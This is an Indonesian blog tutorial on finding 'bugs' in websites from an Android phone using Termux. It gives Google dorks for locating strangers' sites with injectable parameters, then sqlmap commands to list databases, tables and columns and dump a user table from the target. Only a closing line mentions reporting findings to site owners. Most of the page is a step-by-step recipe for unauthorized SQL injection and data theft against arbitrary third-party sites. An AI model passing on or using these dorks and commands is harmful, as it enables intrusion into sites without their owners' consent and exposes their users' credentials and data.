Cara Mencari Bug Website di Hp Android Termux

  • Post author:
  • Post last modified:8 April 2022
Cara mencari bug website

Dalam tutorial kali ini kita akan membahas bagaimana cara mencari celah atau bug website di Hp Android tanpa root.

Bug, merupakan suatu kesalahan atau cacat pada sebuah software atau hardware yang menyebabkan software atau hardware tersebut tidak jalan sebagaimana mestinya.

Baca juga:
Pengertian bug cross site scripting

Mencari Website yang Vulnerability

Ada beberapa tool yang dapat di gunakan untuk menemuka web yang vuln. dalam tutorial ini saya akan menggunakan Google Dork dan tool Droidbug QSL.

Oke langsung ke tahap pertama:

1. Buka web broser kalian dan masukan Dork di bawah ini di menu pencarian browser:

  • add.php?bookid=
  • add_cart.php?num=
  • addcart.php?
  • addItem.php
  • add-to-cart.php?ID=
  • inurl:gallery.php?id=
  • about.php?cartID=
  • accinfo.php?cartId=
  • acclogin.php?cartID=

Maka akan tampil beberapa website yang Vulnerability.

2. Langkah selanjutnya kita akan menguji apakah web tersebut benar2 vulnerability atau terdapat celah keamanannya:

  • Download dan instal aplikasi Droidbus QSL di Hp Android Anda.
  • Setelah terinstal, buka dan pilih menu By URL,s maka akan muncul kolom untuk memasukan link.
  • Copy dan paste link website yang kamu dapat tadi di browser kamu dari Google Dork dan klik SCAN. Biarka proses scaning selesai, jika vuln maka akan ada keterangan Vulnerability berwarna hijau.

Oke, kita lanjut ke Langkah selanjutnya:

SQL Injection Menggunakan SQLmap

Sqlmap adalah perangkat lunak open source. Sqlmap adalah salah satu tool pengujian penetrasi paling kuat yang tersedia di internet. Ini adalah salah satu alat favorit saya dan dikodekan dengan python. Anda dapat menggunakan sqlmap untuk mengeksploitasi dan mengekstrak informasi database dari situs web yang rentan SQL.

Cara mengunduh dan menginstal Sqlmap di Android Termux

Persyaratan

  • Termux
  • Hacker Keyboard
SQL map GitHub https://github.com/sqlmapproject/sqlmap.git

Langkah-langkah:

1. Buka Termux dan ketik perintah pkg update dan tekan Enter.
  • Sekarang install Python2 dengan perintah pkg install python2 dan tekan Enter
  • Install Git dengan perintah pkg install git
2: Sekarang kita akan mengkloning Sqlmap
  • Ketik perintah git clone https://github.com/sqlmapproject/sqlmap.git dan tekan Enter
  • Tunggu hingga download selesai (59MB). Pastikan Anda memiliki koneksi internet yang baik dan stabil kecuali ada kesalahan. Setelah selesai mengunduh.
3: Setelah menyelesaikan pengunduhan
  • Ketik perintah ls untuk melihat daftar file yang tersedia di sana.
  • Ketik perintah cd sqlmap dan tekan Enter. Sekarang Anda berada di direktori sqlmap
  • Ketik perintah ls untuk melihat daftar file yang tersedia di sana.
4: Sekarang kita akan menginstal Sqlmap
  • Ketikkan perintah python2 sqlmap.py
5: Bagaimana cara menggunakan?
  • Ketik perintah python2 sqlmap.py -u (url) dan tekan Enter. Di sini (url) adalah tautan atau situs web Anda. Dalam tangkapan layar ini saya akan mengujinya di situs web saya sendiri.

6. Mencari Celah atau Bug Website

Sampai pada bagian untuk menemukan buat bug website.

Ada beberapa perintah SQL map untuk menemukan data penting website yang akan kita xploit:

  1.  “–dbs” untuk menemukan database tertentu. untuk menjalankannya cukup masukan perintah python2 sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --dbs
  2. –tables” dan “-D“membuka tabel yang ada dalam database. contoh: python2 sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --tables -D namawwbtarget
  3. –colums” untuk mendapatkan kolom sebuah tabel misalnya berisi : id, password, text dll. python2 sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --columns -D namawebtarget -T user
  4. “–dump”, “-D” dan “-T” untuk membuka data yang ada dalam tabel. masukanbperintah ini “contoh:” python sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --dump -D namawbtarget -T user

Nah, apabila kamu sudah menemukan bug pada sebuah website. Selanjutnya kamu bisa melaporkan bug dengan baik ke pemilik wesite.

Tujuannya apa?

Bisa untuk mencari reward, menjalin kerja sama, dan hal menguntungkan lainnya.